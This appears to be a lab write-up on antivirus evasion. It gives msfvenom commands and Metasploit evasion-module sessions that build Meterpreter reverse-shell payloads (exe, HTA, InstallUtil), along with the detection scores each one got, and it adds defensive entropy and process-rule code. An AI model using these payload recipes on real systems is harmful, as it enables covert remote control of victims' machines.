For the last few days I have somehow become fascinated by RAT AV evasion, all because of this repository: https://github.com/TideSec/BypassAntiVirus
Although many of the methods recorded there no longer evade much these days, I still decided to study some of them. I only used part of the earlier evasion tools; my impression is that most of them are inseparable from msfvenom, and the ones I found not to evade I did not bother recording. The 360 suite and Huorong are the main scanners here, with VT as a reference.
(msfvenom's parameters are not covered here.)
Plain payload, no encoder:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -f exe -o ./payload1.exe
```

VT: 58/72; Huorong and 360 both flag it instantly.
With the x86/shikata_ga_nai encoder, 15 iterations:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o ./payload2.exe
```

VT: 57/72; Huorong and 360 flag it instantly.
Injected into a template executable with `-x`:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -x 11.exe -f exe -o ./payload3.exe
```

(11.exe is a normal, backdoor-free executable, a small tool I wrote myself in Python and packaged as an .exe.)

VT: 11/72; Huorong and 360 still flag it instantly.
Template plus encoder (the original command was missing the dash on `-f exe`; corrected here):

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -x 11.exe -i 5 -f exe -o ./payload4.exe
```

(This approach is problematic; the generated payload very often fails to run.)
Chained encoders through a pipe, with a 360 binary as the template. The downstream stages read a raw blob from stdin and cannot infer the architecture or platform from it, so they need `-a x86 --platform windows` to select an encoder; those flags were absent from the original command and are added here:

```
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.111.128 LPORT=4444 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x 360sd.exe -f exe -o payload5.exe
```

(For reference only; msfvenom failed to generate it for me and I did not pursue it further.)
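The runs above show the pattern that makes encoders so unhelpful against static scanning: payload1 and payload2 score almost identically, while the `-x` template run drops to 11/72. One static heuristic that contributes to this is per-section entropy, since an encoder turns the payload into a near-random blob inside an executable section, which is itself a signal, whereas a template keeps a legitimate binary's structure around the payload. The following is an added example, not code from the original post or from Metasploit: it parses a PE's section table by hand and reports Shannon entropy per section, flagging executable sections above a threshold. The image built by `build_sample_pe()` is a constructed, header-only PE (not loadable) so the example runs offline; the `.inj` section name and the 7.0 bits/byte threshold are assumptions, not values taken from any product.

```python
"""Per-section entropy scan of a PE image.

Added example, not code from the original post or from Metasploit. Static
engines treat a high-entropy executable section as a strong signal, and an
encoder such as shikata_ga_nai produces exactly that. This parses the PE
section table by hand and reports Shannon entropy per section. The image
returned by build_sample_pe() is a constructed, header-only PE (it is not
loadable) so the example runs offline; '.inj' and the 7.0 threshold are
assumptions, not values taken from any product.
"""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section Characteristics flag


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (name, raw_offset, raw_size, characteristics) per section header."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size             # first IMAGE_SECTION_HEADER (40 bytes each)
    for i in range(num_sections):
        fields = struct.unpack_from("<8sIIIIIIHHI", image, table + i * 40)
        name, _vsize, _va, raw_size, raw_ptr = fields[:5]
        chars = fields[9]
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size, chars


def scan(image: bytes, threshold: float = 7.0):
    """Return {name: (entropy, is_executable, suspicious)} for every section.

    Compiled x86 code usually lands around 5 to 6.5 bits/byte; an encoded or
    encrypted payload approaches 8, so an executable section above threshold
    is flagged.
    """
    report = {}
    for name, raw_ptr, raw_size, chars in pe_sections(image):
        entropy = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
        executable = bool(chars & IMAGE_SCN_MEM_EXECUTE)
        report[name] = (round(entropy, 3), executable, executable and entropy > threshold)
    return report


def build_sample_pe() -> bytes:
    """Constructed test image: a repetitive '.text' plus a pseudo-random '.inj'."""
    # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret -- repeated, low entropy
    code = bytes([0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x5D, 0xC3]) * 64
    blob, seed = b"", b"constructed-sample"  # deterministic stand-in for encoded shellcode
    while len(blob) < 4096:
        seed = hashlib.sha256(seed).digest()
        blob += seed
    e_lfanew, text_off, inj_off = 0x40, 0x200, 0x400
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # i386, two sections, no optional header (SizeOfOptionalHeader = 0)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)

    def section(name, raw_ptr, size, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, 0x1000, size, raw_ptr, 0, 0, 0, 0, chars)

    header = dos + b"PE\0\0" + coff
    header += section(b".text", text_off, len(code), 0x60000020)  # CODE|EXECUTE|READ
    header += section(b".inj", inj_off, len(blob), 0xE0000020)    # CODE|EXECUTE|READ|WRITE
    return header.ljust(text_off, b"\0") + code.ljust(inj_off - text_off, b"\0") + blob


if __name__ == "__main__":
    for name, (entropy, executable, suspicious) in scan(build_sample_pe()).items():
        print(f"{name:8s} entropy={entropy:.3f} exec={executable} "
              f"{'SUSPICIOUS' if suspicious else 'ok'}")
```

Run it against payload2.exe and payload3.exe from above and compare: the section holding the shikata_ga_nai output will sit near 8 bits/byte regardless of iteration count, which is why adding iterations changes nothing in the VT score. Note that entropy alone is a weak classifier (packed or compressed legitimate binaries trip it too); it is one feature among many, not a verdict.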
`show evasion` lists the evasion modules available.
```
msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  ukup.exe         yes       Filename for the evasive file (default: random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe
```

360 flagged it statically on the spot, so there was no point trying Huorong. (Huorong is the tougher of the two.)
```
msf5 evasion(windows/windows_defender_exe) > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > show options

Module options (evasion/windows/windows_defender_js_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  WfvPutTKt.hta    yes       Filename for the evasive file (default: random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta
filename => payload.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload.hta stored at /root/.msf4/local/payload.hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set filename payload1.hta
filename => payload1.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload1.hta stored at /root/.msf4/local/payload1.hta
```

Neither the 360 suite nor Huorong flagged either file. (Although nothing was flagged statically, when the HTA runs it spawns a new program to return the shell, and that new program does not get past Huorong or 360, i.e. it fails behavioral detection.)
VT for payload.hta (x64): 23/59; payload1.hta (x86): 23/58.
```
msf5 evasion(windows/windows_defender_js_hta) > use windows/applocker_evasion_install_util
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/applocker_evasion_install_util) >
msf5 evasion(windows/applocker_evasion_install_util) > show options

Module options (evasion/windows/applocker_evasion_install_util):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  install_util.txt  yes       Filename for the evasive file (default: install_util.txt)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 evasion(windows/applocker_evasion_install_util) > set filename payload.txt
filename => payload.txt
msf5 evasion(windows/applocker_evasion_install_util) > show options

Module options (evasion/windows/applocker_evasion_install_util):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  payload.txt      yes       Filename for the evasive file (default: install_util.txt)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 evasion(windows/applocker_evasion_install_util) > run
[+] payload.txt stored at /root/.msf4/local/payload.txt
[*] Copy payload.txt to the target
[*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:payload.exe payload.txt
[*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
```

Both 360 and Huorong let it through statically, but behavioral detection kills it.
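The two behavioral failures noted above (the HTA spawning a child process, and InstallUtil.exe being handed a user-supplied assembly via `/U`) are exactly the process-creation patterns a detection engineer writes rules against, and they explain why a clean static scan is not the end of the story. The following is an added example, not part of the original post: a small rule set run over constructed process-creation events (image, parent image, command line; the paths, user name and file names are made up), flagging mshta.exe spawning a child, InstallUtil.exe uninstalling an assembly outside C:\Windows, and csc.exe writing its output into a user path, since the module instructs you to compile payload.txt on the target. The rule names are assumptions.

```python
"""Process-creation rules for the HTA and InstallUtil tradecraft discussed above.

Added example, not code from the original post. SAMPLE_EVENTS is constructed
telemetry (image, parent image, command line), not captured from a real host.
"""
import re

# /U <assembly>: InstallUtil runs the assembly's uninstall path, which is where
# the applocker_evasion_install_util payload executes.
INSTALLUTIL_UNINSTALL = re.compile(r'(?i)(?:^|\s)/u\s+("[^"]+"|\S+)')
# csc.exe /out:<path>: the module tells you to compile payload.txt on the target.
CSC_OUT = re.compile(r'(?i)/out:("[^"]+"|\S+)')

SAMPLE_EVENTS = [  # constructed events; user, paths and file names are made up
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Users\bob\Downloads\payload.hta'},
    {"image": r"C:\Users\bob\AppData\Local\Temp\stage.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\stage.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"csc.exe /out:C:\Users\bob\payload.exe C:\Users\bob\payload.txt"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\bob\payload.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, quotes and directories stripped."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _under_windows_dir(path: str) -> bool:
    """Crude allow-list: assemblies that ship with the OS live under C:\\Windows."""
    return path.strip('"').lower().startswith("c:\\windows\\")


def detect(event: dict) -> list:
    """Return the rule names the event triggers (empty list if nothing fires)."""
    hits = []
    image, parent, cmdline = event["image"], event["parent"], event["cmdline"]
    # The HTA module's shell comes from a process the HTA host spawns.
    if _basename(parent) == "mshta.exe":
        hits.append("mshta_spawned_child")
    # InstallUtil /U on an assembly that did not come with Windows.
    if _basename(image) == "installutil.exe":
        m = INSTALLUTIL_UNINSTALL.search(cmdline)
        if m and not _under_windows_dir(m.group(1)):
            hits.append("installutil_uninstall_user_assembly")
    # On-host compilation dropping a binary into a user-writable location.
    if _basename(image) == "csc.exe":
        m = CSC_OUT.search(cmdline)
        if m and not _under_windows_dir(m.group(1)):
            hits.append("csc_output_in_user_path")
    return hits


def scan_events(events: list) -> list:
    """Return [(event_index, rule_name), ...] for every rule that fires."""
    return [(i, rule) for i, ev in enumerate(events) for rule in detect(ev)]


if __name__ == "__main__":
    for i, rule in scan_events(SAMPLE_EVENTS):
        print(f"event {i}: {rule} <- {SAMPLE_EVENTS[i]['cmdline']}")
```

The `C:\Windows\` prefix check is deliberately simple and has a known hole: directories such as `C:\Windows\Temp` are writable by ordinary users, so an assembly dropped there passes the allow-list. In a real rule you would exclude those subdirectories, or key on the parent process and the user context instead of the path alone.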